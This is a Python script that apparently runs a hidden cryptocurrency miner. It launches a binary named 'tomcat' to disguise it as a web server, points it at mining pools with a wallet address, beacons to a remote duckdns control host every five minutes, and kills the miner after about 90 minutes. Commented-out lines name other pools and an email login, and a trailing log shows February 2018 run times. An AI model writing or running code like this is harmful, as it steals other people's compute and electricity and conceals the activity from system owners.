import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:01.429076
#2018-02-17 16:28:04.338081
#2018-02-17 18:14:05.400961
#2018-02-17 20:01:04.792681
#2018-02-17 21:49:07.290894
#2018-02-17 23:35:06.870916
#2018-02-18 01:24:05.993347
#2018-02-18 03:11:03.228916
#2018-02-18 05:01:03.894927
#2018-02-18 06:53:01.780699
#2018-02-18 08:40:06.198914
#2018-02-18 10:26:06.938355
#2018-02-18 12:12:03.481895
#2018-02-18 13:58:05.394466
#2018-02-18 15:47:07.084283
#2018-02-18 17:38:03.892033
#2018-02-18 19:26:05.485680
#2018-02-18 21:13:03.406104
#2018-02-18 23:01:04.735275
#2018-02-19 00:48:01.923794
#2018-02-19 02:35:07.011206
#2018-02-19 04:21:07.200504
#2018-02-19 06:06:06.756641
#2018-02-19 07:54:07.090569
#2018-02-19 09:44:05.915630
#2018-02-19 11:34:07.310170
#2018-02-19 13:21:01.659668
#2018-02-19 15:08:08.362945
#2018-02-19 16:57:08.659522
#2018-02-19 18:45:10.060933
#2018-02-19 20:34:06.544882
#2018-02-19 22:43:06.949467
#2018-02-20 00:26:01.960589
#2018-02-20 02:14:06.874140
#2018-02-20 04:05:04.110517
#2018-02-20 05:47:08.137840
#2018-02-20 07:34:04.899832
#2018-02-20 09:18:05.276819
#2018-02-20 11:02:02.139548
#2018-02-20 12:48:07.308199
#2018-02-20 14:34:07.870411
#2018-02-20 16:19:09.043996
#2018-02-20 18:06:07.052235
#2018-02-20 19:58:05.331796
#2018-02-20 21:45:11.297409
#2018-02-20 23:28:08.913103
#2018-02-21 01:12:04.404675
#2018-02-21 02:58:06.140402
#2018-02-21 04:46:06.392074
#2018-02-21 06:35:03.084056
#2018-02-21 08:21:15.358833
#2018-02-21 10:06:08.678048
#2018-02-21 11:54:04.618238
#2018-02-21 13:45:10.725141
#2018-02-21 15:33:06.606945
#2018-02-21 17:22:09.610631
#2018-02-21 19:11:05.578451
#2018-02-21 20:58:02.197393
#2018-02-21 22:44:04.647113
#2018-02-22 00:34:01.682332
#2018-02-22 02:21:04.537030
#2018-02-22 04:08:01.917108
#2018-02-22 05:52:05.808551
#2018-02-22 07:37:04.362163
#2018-02-22 09:26:01.838473
#2018-02-22 11:11:07.764752
#2018-02-22 12:56:08.732624
#2018-02-22 14:43:08.262713
#2018-02-22 16:28:09.007222
#2018-02-22 18:14:08.068297
#2018-02-22 20:02:08.155776
#2018-02-22 21:50:08.565284
#2018-02-22 23:37:05.640269
#2018-02-23 01:24:04.185147
#2018-02-23 03:10:04.996543
#2018-02-23 04:58:05.958745
#2018-02-23 06:43:05.542426
#2018-02-23 08:33:06.592918
#2018-02-23 10:48:05.773723
#2018-02-23 12:46:01.257220
#2018-02-23 14:29:06.791415
#2018-02-23 16:20:01.403590
#2018-02-23 18:06:06.918614
#2018-02-23 19:50:04.505750
#2018-02-23 21:34:07.899939
#2018-02-23 23:21:06.534159
#2018-02-24 01:14:05.506534
#2018-02-24 03:06:01.499263
#2018-02-24 04:52:07.090509
#2018-02-24 06:38:03.574272
#2018-02-24 08:27:06.607004
#2018-02-24 10:13:06.952682
#2018-02-24 12:07:06.322780
#2018-02-24 13:56:02.012738
#2018-02-24 15:46:06.304934
#2018-02-24 17:38:06.459773
#2018-02-24 19:23:03.619373
#2018-02-24 21:13:04.158975
#2018-02-24 23:47:05.877030
#2018-02-25 03:07:05.123205
#2018-02-25 06:59:07.643091